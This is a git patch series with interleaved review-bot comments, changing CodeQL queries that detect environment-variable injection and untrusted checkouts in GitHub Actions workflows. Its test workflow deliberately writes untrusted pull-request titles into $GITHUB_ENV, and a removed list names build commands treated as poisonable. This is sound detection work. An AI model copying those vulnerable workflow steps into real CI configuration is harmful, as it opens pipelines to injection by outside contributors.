@@ -87,6 +108,19 @@ module Utils { .splitAt("\n") + ")" and key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) ) + or + // multiline heredoc assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 3)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") and + key = trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 2)) + ) } bindingset[line] diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 6e6e768bdf7..0467a51f4e9 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -39,7 +39,10 @@ class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { * that is used to construct and evaluate an environment variable. */ private module EnvVarInjectionConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + not source.(RemoteFlowSource).getSourceType() = "branch" + } predicate isSink(DataFlow::Node sink) { sink instanceof EnvVarInjectionSink } } diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjection.ql index 50ad0149703..80d1729b267 100644 --- a/ql/src/Security/CWE-077/EnvPathInjection.ql +++ b/ql/src/Security/CWE-077/EnvPathInjection.ql 
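Review bot: `isSource` in EnvVarInjectionQuery.qll now drops every source whose type is `"branch"` without saying why, and the filter it replaces in the two query files was equally unexplained. Presumably the reasoning is that a git ref name cannot contain a newline and so cannot add a second entry to the env file; if so, a comment such as `// branch names cannot contain newlines, so they cannot append extra entries to the env file` belongs on that line. That reasoning only covers writes where the branch name is the right-hand side of `NAME=...`, so it is worth confirming that no modelled sink writes the tainted value as the whole line before excluding the source type for every sink.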
@@ -20,8 +20,10 @@ from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and ( + // sink belongs to a composite action exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or + // sink belongs to a non-privileged job exists(Job j | j = sink.getNode().asExpr().getEnclosingJob() and not j.isPrivileged() diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql index 109d77d7425..8c251095457 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql @@ -16,23 +16,29 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph +predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { + ( + not source.(RemoteFlowSource).getSourceType() = "artifact" + or + source.(RemoteFlowSource).getSourceType() = "artifact" and + sink instanceof EnvVarInjectionFromFileReadSink + ) +} + from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and ( + // sink belongs to a composite action exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or + // sink belongs to a non-privileged job exists(Job j | j = sink.getNode().asExpr().getEnclosingJob() and not j.isPrivileged() ) and - ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" - or - source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and - sink.getNode() instanceof EnvVarInjectionFromFileReadSink - ) and - not source.getNode().(RemoteFlowSource).getSourceType() = "branch" + // exclude paths to file read sinks from non-artifact sources + artifactToFileRead(source.getNode(), sink.getNode()) ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", 
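Review bot: In the `where` clause of EnvVarInjection.ql, `and` binds tighter than `or`, so `artifactToFileRead(source.getNode(), sink.getNode())` constrains only the non-privileged-job alternative, and a sink inside a composite action is reported without the artifact filter. If that is not intended, wrap the two `exists` alternatives in their own parentheses and apply the filter to both. The comment `// exclude paths to file read sinks from non-artifact sources` also reads backwards: the predicate keeps every non-artifact source and drops artifact sources that reach anything other than an `EnvVarInjectionFromFileReadSink`, so `// artifact sources are only reported when they reach a file-read sink` would match the code. The same predicate is copied verbatim into PrivilegedEnvVarInjection.ql; defining it once in EnvVarInjectionQuery.qll would keep the two queries from drifting.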
diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql index 593fd620c9f..a25473fd812 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql @@ -19,10 +19,8 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() - ) and + // sink belongs to a privileged job + sink.getNode().asExpr().getEnclosingJob().isPrivileged() and ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index bf637af1195..5311d9a4de8 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql 
@@ -16,20 +16,22 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph +predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { + ( + not source.(RemoteFlowSource).getSourceType() = "artifact" + or + source.(RemoteFlowSource).getSourceType() = "artifact" and + sink instanceof EnvVarInjectionFromFileReadSink + ) +} + from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() - ) and - ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" - or - source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and - sink.getNode() instanceof EnvVarInjectionFromFileReadSink - ) and - not source.getNode().(RemoteFlowSource).getSourceType() = "branch" + // sink belongs to a privileged job + sink.getNode().asExpr().getEnclosingJob().isPrivileged() and + // exclude paths to file read sinks from non-artifact sources + artifactToFileRead(source.getNode(), sink.getNode()) select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 5061f51db62..154a8135bad 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml 
@@ -42,12 +42,19 @@ jobs: - env: TITLE: ${{ github.event.pull_request.title }} run: | - cat <<-"EOF" >> "$GITHUB_ENV" + cat <<-EOF >> "$GITHUB_ENV" echo "FOO=$TITLE" EOF - env: TITLE: ${{ github.event.pull_request.head.ref }} run: | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV + - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV + env: + TARGET_BRANCH: ${{ github.head_ref }} + - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV + env: + TARGET_BRANCH: ${{ github.event.pull_request.title }} + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 1cb0b78a29b..241a33146b8 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected 
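Review bot: Changing `cat <<-"EOF"` to `cat <<-EOF` in test4.yml replaces the quoted-delimiter case instead of adding to it, so no step now pins how a quoted heredoc is treated. With a quoted delimiter the shell does not expand `$TITLE`, so that form is worth keeping as a separate step that is expected not to appear in the .expected files. The two new `BRANCH=` steps have identical `run` text and differ only in the `env` source, so a `name:` on each stating the expected outcome, for example `name: branch source, not reported` and `name: title source, reported`, would make the expectations readable without cross-checking line numbers.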
@@ -7,7 +7,8 @@ edges | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | 
@@ -26,8 +27,10 @@ nodes | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | -| .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> 
$GITHUB_ENV\n | subpaths diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 701cefe2b79..8c9d923bd35 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -7,7 +7,8 @@ edges | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | 
@@ -26,8 +27,10 @@ nodes | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | -| .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> 
$GITHUB_ENV\n | subpaths 
@@ -40,4 +43,6 @@ subpaths | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | From 831b8cfaa6f0aca1369ae2d6a28b39af20217279 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 28 Apr 2024 12:03:40 +0200 Subject: [PATCH 0227/1267] Bump qlpack versions --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 2 -- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 3 files changed, 2 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 754d28cb93e..6dd9b5d3617 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -211,8 +211,6 @@ class EventSource extends RemoteFlowSource { or textEvent(context) and flag = "text" or - repoNameEvent(context) and flag = "repo name" - or branchEvent(context) and flag = "branch" or labelEvent(context) and flag = "label" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1710768761f..3800ce9e85c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.18 +version: 0.0.19 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 24f07dafe89..c431636c96a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.18 +version: 0.0.19 groups: - actions - queries From 9843f375ee7acc33f2d26a268d48d10e031c0a44 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Apr 2024 12:20:53 +0200 Subject: [PATCH 0228/1267] ignore runtime info for pull_request triggered workflows --- ql/lib/codeql/actions/ast/internal/Ast.qll | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 0c53dae6371..0cbb8ab10ed 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -635,19 +635,22 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Holds if the workflow is privileged. */ predicate isPrivileged() { - // The job has a permission to write to some scope + // the job has an explicit write permission this.getPermissions().getAPermission() = "write" or - // The job accesses a secret + // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" ) or - // The effective permissions have write access - exists(string path, string name, string secrets_source, string perms | - workflowDataModel(path, _, name, secrets_source, perms, _) and + // the effective permissions have write access + exists(string path, string trigger, string name, string secrets_source, string perms | + workflowDataModel(path, trigger, name, secrets_source, perms, _) and path.trim() = this.getLocation().getFile().getRelativePath() and name.trim().matches(this.getId() + "%") and + // We cannot trust the permissions for pull_request events since they depend on the + // location of the head branch + not trigger.trim() = "pull_request" and ( secrets_source.trim().toLowerCase() = "actions" or perms.toLowerCase().matches("%write%") From 16c77cbe255a72c263bcdf63ac93ad8b7c12f06c Mon Sep 17 00:00:00 2001 
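Review bot: The new `not trigger.trim() = "pull_request"` guard in `isPrivileged()` discards the whole `workflowDataModel` row, including the `secrets_source` check, while the added comment only speaks about permissions. Spelling out both would help the next reader, e.g. `// Runtime permissions and secret access of pull_request runs depend on where the head branch lives, so rows for that trigger are ignored`. The comparison is also exact and case-sensitive, whereas the neighbouring `secrets_source` and `perms` fields are lower-cased first; if the trigger column is not guaranteed to be normalised, `not trigger.trim().toLowerCase() = "pull_request"` would be consistent with them. The predicate's closing lines are outside the hunk.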
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 4 May 2024 23:27:26 +0200 Subject: [PATCH 0229/1267] Refactor untrusted checkout queries --- .../security/ArtifactPoisoningQuery.qll | 85 +------ .../actions/security/PoisonableSteps.qll | 64 +++++ .../security/UntrustedCheckoutQuery.qll | 229 ++++++++++++++++++ ql/lib/qlpack.yml | 2 +- ql/src/Security/CWE-829/UntrustedCheckout.ql | 150 ------------ ...dCheckout.md => UntrustedCheckoutError.md} | 0 .../CWE-829/UntrustedCheckoutError.ql | 28 +++ .../CWE-829/UntrustedCheckoutWarning.md | 0 .../CWE-829/UntrustedCheckoutWarning.ql | 28 +++ ql/src/qlpack.yml | 2 +- .../.github/workflows/artifactpoisoning21.yml | 2 +- .../.github/workflows/artifactpoisoning22.yml | 2 +- .../CWE-829/ArtifactPoisoning.expected | 8 +- .../PrivilegedArtifactPoisoning.expected | 12 +- .../Security/CWE-829/UntrustedCheckout.qlref | 1 - .../CWE-829/UntrustedCheckoutError.expected | 6 + .../CWE-829/UntrustedCheckoutError.qlref | 1 + ...cted => UntrustedCheckoutWarning.expected} | 6 - .../CWE-829/UntrustedCheckoutWarning.qlref | 1 + 19 files changed, 383 insertions(+), 244 deletions(-) create mode 100644 ql/lib/codeql/actions/security/PoisonableSteps.qll create mode 100644 ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll delete mode 100644 ql/src/Security/CWE-829/UntrustedCheckout.ql rename ql/src/Security/CWE-829/{UntrustedCheckout.md => UntrustedCheckoutError.md} (100%) create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutError.ql create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutWarning.md create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql delete mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref rename ql/test/query-tests/Security/CWE-829/{UntrustedCheckout.expected => UntrustedCheckoutWarning.expected} 
(79%) create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 8b7eb51276d..3635004bc31 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -3,6 +3,7 @@ private import codeql.actions.TaintTracking import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources +import codeql.actions.security.PoisonableSteps string unzipRegexp() { result = ".*(unzip|tar)\\s+.*" } 
@@ -228,81 +229,19 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run {
 }
 }
-abstract class PoisonableStep extends Step { }
-
-// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16
-private string dangerousActions() {
- result =
- ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby"]
-}
-
-class DangerousActionUsesStep extends PoisonableStep, UsesStep {
- DangerousActionUsesStep() {
- exists(UntrustedArtifactDownloadStep step |
- step.getAFollowingStep() = this and
- this.getCallee() = dangerousActions()
- )
- }
-}
-
-// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23
-private string dangerousCommands() {
- result =
- [
- "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan",
- "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate",
- "msbuild ", "mvn ", "./mvnw ", "gradle ", "./gradlew ", "bundle install", "bundle exec ",
- "^ant ", "mkdocs build", "pytest"
- ]
-}
-
-class BuildRunStep extends PoisonableStep, Run {
